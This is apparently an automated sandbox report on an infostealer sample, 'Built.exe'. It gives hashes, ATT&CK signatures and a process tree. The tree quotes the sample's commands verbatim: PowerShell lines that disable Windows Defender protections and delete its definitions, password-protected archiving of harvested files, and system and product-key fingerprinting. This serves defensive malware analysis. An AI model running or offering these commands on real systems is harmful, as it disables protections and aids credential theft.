af47a29761bf74b3c78795c61a0a165e0ec4134d2561343df42798dcdb32297c

Analysis

max time kernel
3s
max time network
16s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
30-10-2024 13:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.9MB
MD5

e876252404837ba49897faa048762c81
SHA1

39a408228999f4f18ebb890d5417ed6118a6d8da
SHA256

af47a29761bf74b3c78795c61a0a165e0ec4134d2561343df42798dcdb32297c
SHA512

d2f83d0d2fe190bb7ad338ab6c5ce1f837cb08b40e1325e12941da0fbdd248d05b7f6baca55b519d3d115d69d0e1e34faa563b8fff41e406342688144f684279
SSDEEP

98304:qRDjWM8JEE1FVHamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIFY:qR0bqeNTfm/pf+xk4dWRpmrbW3jmrg

Score

10^/10

evasion execution spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
10048	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3244	powershell.exe
3504	powershell.exe
10176	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe
224	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
51	ip-api.com

UPX packed file 41 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002800000004514a-21.dat	upx
behavioral1/memory/224-25-0x00007FFBD88F0000-0x00007FFBD8ED8000-memory.dmp	upx
behavioral1/files/0x00280000000450fa-27.dat	upx
behavioral1/files/0x0028000000045137-29.dat	upx
behavioral1/files/0x002800000004512f-48.dat	upx
behavioral1/files/0x002800000004512e-47.dat	upx
behavioral1/files/0x002800000004512d-46.dat	upx
behavioral1/files/0x002800000004512c-45.dat	upx
behavioral1/files/0x00280000000450fd-44.dat	upx
behavioral1/files/0x00280000000450fc-43.dat	upx
behavioral1/files/0x00280000000450fb-42.dat	upx
behavioral1/files/0x00280000000450f7-41.dat	upx
behavioral1/files/0x0028000000045154-40.dat	upx
behavioral1/files/0x0028000000045153-39.dat	upx
behavioral1/files/0x0028000000045152-38.dat	upx
behavioral1/files/0x0028000000045138-35.dat	upx
behavioral1/files/0x0028000000045136-34.dat	upx
behavioral1/memory/224-32-0x00007FFBEFDC0000-0x00007FFBEFDCF000-memory.dmp	upx
behavioral1/memory/224-31-0x00007FFBEC990000-0x00007FFBEC9B4000-memory.dmp	upx
behavioral1/memory/224-54-0x00007FFBE7D20000-0x00007FFBE7D4D000-memory.dmp	upx
behavioral1/memory/224-56-0x00007FFBE7E80000-0x00007FFBE7E99000-memory.dmp	upx
behavioral1/memory/224-58-0x00007FFBE7C30000-0x00007FFBE7C53000-memory.dmp	upx
behavioral1/memory/224-60-0x00007FFBD8770000-0x00007FFBD88E3000-memory.dmp	upx
behavioral1/memory/224-62-0x00007FFBEC970000-0x00007FFBEC989000-memory.dmp	upx
behavioral1/memory/224-64-0x00007FFBEF100000-0x00007FFBEF10D000-memory.dmp	upx
behavioral1/memory/224-67-0x00007FFBD88F0000-0x00007FFBD8ED8000-memory.dmp	upx
behavioral1/memory/224-72-0x00007FFBE7AA0000-0x00007FFBE7B58000-memory.dmp	upx
behavioral1/memory/224-73-0x00007FFBD83F0000-0x00007FFBD8765000-memory.dmp	upx
behavioral1/memory/224-70-0x00007FFBEC900000-0x00007FFBEC92E000-memory.dmp	upx
behavioral1/memory/224-76-0x00007FFBE7BF0000-0x00007FFBE7C04000-memory.dmp	upx
behavioral1/memory/224-78-0x00007FFBEF0F0000-0x00007FFBEF0FD000-memory.dmp	upx
behavioral1/memory/224-75-0x00007FFBEC990000-0x00007FFBEC9B4000-memory.dmp	upx
behavioral1/memory/224-80-0x00007FFBE6FB0000-0x00007FFBE70CC000-memory.dmp	upx
behavioral1/memory/224-309-0x00007FFBE7C30000-0x00007FFBE7C53000-memory.dmp	upx
behavioral1/memory/224-343-0x00007FFBD8770000-0x00007FFBD88E3000-memory.dmp	upx
behavioral1/memory/224-505-0x00007FFBEC900000-0x00007FFBEC92E000-memory.dmp	upx
behavioral1/memory/224-535-0x00007FFBD83F0000-0x00007FFBD8765000-memory.dmp	upx
behavioral1/memory/224-534-0x00007FFBE7AA0000-0x00007FFBE7B58000-memory.dmp	upx
behavioral1/memory/224-520-0x00007FFBEC990000-0x00007FFBEC9B4000-memory.dmp	upx
behavioral1/memory/224-519-0x00007FFBD88F0000-0x00007FFBD8ED8000-memory.dmp	upx
behavioral1/memory/224-456-0x00007FFBEC970000-0x00007FFBEC989000-memory.dmp	upx

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5396	WMIC.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3244	powershell.exe
3504	powershell.exe
3244	powershell.exe
3504	powershell.exe
3504	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2460	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5040 wrote to memory of 224	5040	Built.exe	82
PID 5040 wrote to memory of 224	5040	Built.exe	82
PID 224 wrote to memory of 4404	224	Built.exe	84
PID 224 wrote to memory of 4404	224	Built.exe	84
PID 224 wrote to memory of 4336	224	Built.exe	85
PID 224 wrote to memory of 4336	224	Built.exe	85
PID 224 wrote to memory of 4716	224	Built.exe	86
PID 224 wrote to memory of 4716	224	Built.exe	86
PID 4716 wrote to memory of 3804	4716	cmd.exe	91
PID 4716 wrote to memory of 3804	4716	cmd.exe	91
PID 4336 wrote to memory of 3504	4336	cmd.exe	93
PID 4336 wrote to memory of 3504	4336	cmd.exe	93
PID 4404 wrote to memory of 3244	4404	cmd.exe	95
PID 4404 wrote to memory of 3244	4404	cmd.exe	95
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 1044 wrote to memory of 2460	1044	firefox.exe	96
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97
PID 2460 wrote to memory of 1824	2460	firefox.exe	97

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5040
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3504
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:10048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('l', 0, ';', 16+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4716
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('l', 0, ';', 16+16);close()"
      4⤵
      PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50402\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\WFmsG.zip" *"
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Local\Temp\_MEI50402\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI50402\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\WFmsG.zip" *
      4⤵
      PID:568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5404
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:8408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:8596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:9968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:10072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:10116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:10176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:9592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:8736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:8716

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1044
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1880 -prefMapHandle 1872 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {09e0e387-c9aa-472b-8cd1-b3a5052f44aa} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" gpu
    3⤵
    PID:1824
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2380 -prefMapHandle 2376 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49ef16cf-047f-4c2e-8515-4dc3ab55611f} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" socket
    3⤵
    PID:1448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2828 -childID 1 -isForBrowser -prefsHandle 2752 -prefMapHandle 2872 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddc95954-6573-49b4-9f9e-9eba7d51fcf7} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3716 -childID 2 -isForBrowser -prefsHandle 3516 -prefMapHandle 3712 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b0e86f8-9255-4ba9-a1f1-8f9dd84651e8} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:1628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4264 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4376 -prefMapHandle 4352 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40dfc9a7-249e-4643-b58b-95493b369304} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" utility
    3⤵
    PID:4468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 3 -isForBrowser -prefsHandle 5376 -prefMapHandle 5404 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a1cf31c-8cd0-498f-b357-a569dd2050f9} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:6068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 4 -isForBrowser -prefsHandle 5392 -prefMapHandle 2368 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5900107-a58b-4e90-acd5-3bec272fb99a} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:6084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 5 -isForBrowser -prefsHandle 5184 -prefMapHandle 5124 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {654f4ed8-980d-4ea2-88e2-33be32c3ecdc} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:6100
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5824 -childID 6 -isForBrowser -prefsHandle 5832 -prefMapHandle 5840 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80c297ff-e041-41d6-85ac-f0fc4ffaab4a} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:6116
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6012 -childID 7 -isForBrowser -prefsHandle 6024 -prefMapHandle 5060 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3e7af88-4617-4194-9b4a-e826d32468d8} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:6128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5808 -childID 8 -isForBrowser -prefsHandle 6080 -prefMapHandle 6084 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a54da7c-8d30-42c3-a6ea-f0ed1e49348c} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:6140
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6300 -childID 9 -isForBrowser -prefsHandle 6312 -prefMapHandle 6256 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b72b62a8-ded4-4a3a-ab1d-48d19cf350e5} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:2052
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6460 -childID 10 -isForBrowser -prefsHandle 6468 -prefMapHandle 6472 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85da453c-6273-436d-885f-cd8803725bfb} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:2916
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6772 -childID 11 -isForBrowser -prefsHandle 6764 -prefMapHandle 6760 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e381351-8655-4324-99fb-7f66db80c991} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:2080
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6668 -childID 12 -isForBrowser -prefsHandle 6904 -prefMapHandle 6912 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6af13e1-a7aa-4148-9ba8-0285a75b94f2} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:1976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7076 -childID 13 -isForBrowser -prefsHandle 7032 -prefMapHandle 6460 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c281864b-fdc3-4edf-a8eb-7d7fc19f1429} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7244 -childID 14 -isForBrowser -prefsHandle 7252 -prefMapHandle 7256 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2cc3a3bf-9260-4cb4-88f4-11c0b1c06560} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:5140
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7444 -childID 15 -isForBrowser -prefsHandle 7452 -prefMapHandle 7456 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {595448f8-c206-4b0a-b0f5-b4add3ab4531} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3784
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7628 -childID 16 -isForBrowser -prefsHandle 7636 -prefMapHandle 7640 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07d84452-c0a7-426f-bc9e-9eae6b864637} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:236
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7828 -childID 17 -isForBrowser -prefsHandle 7836 -prefMapHandle 7840 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d5df2cf-90ab-4fe3-ae7c-ffe45be17230} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:2428
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8012 -childID 18 -isForBrowser -prefsHandle 8020 -prefMapHandle 8024 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e2df854-c103-4f9e-bc9c-d82ca2b83f70} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3380
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8208 -childID 19 -isForBrowser -prefsHandle 8216 -prefMapHandle 8220 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89ae1f62-f6b6-4e0b-a2ad-98b1938ed407} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:4456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8428 -childID 20 -isForBrowser -prefsHandle 8384 -prefMapHandle 8188 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4edff479-d7bb-4ef2-b1f9-1ad779081f5c} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3916
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8416 -childID 21 -isForBrowser -prefsHandle 8616 -prefMapHandle 8620 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6866dfb-1ace-4cb2-93c3-9d6f1d20a5dc} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:1572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8784 -childID 22 -isForBrowser -prefsHandle 8792 -prefMapHandle 8796 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49dd40c1-8d91-4b83-842a-23ecbbc0db28} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:3544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8908 -childID 23 -isForBrowser -prefsHandle 8916 -prefMapHandle 8920 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5a4b0c6-0610-44de-a275-a46b9cd47a5d} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" tab
    3⤵
    PID:864
- - C:\Program Files\Mozilla Firefox\firefox.exe
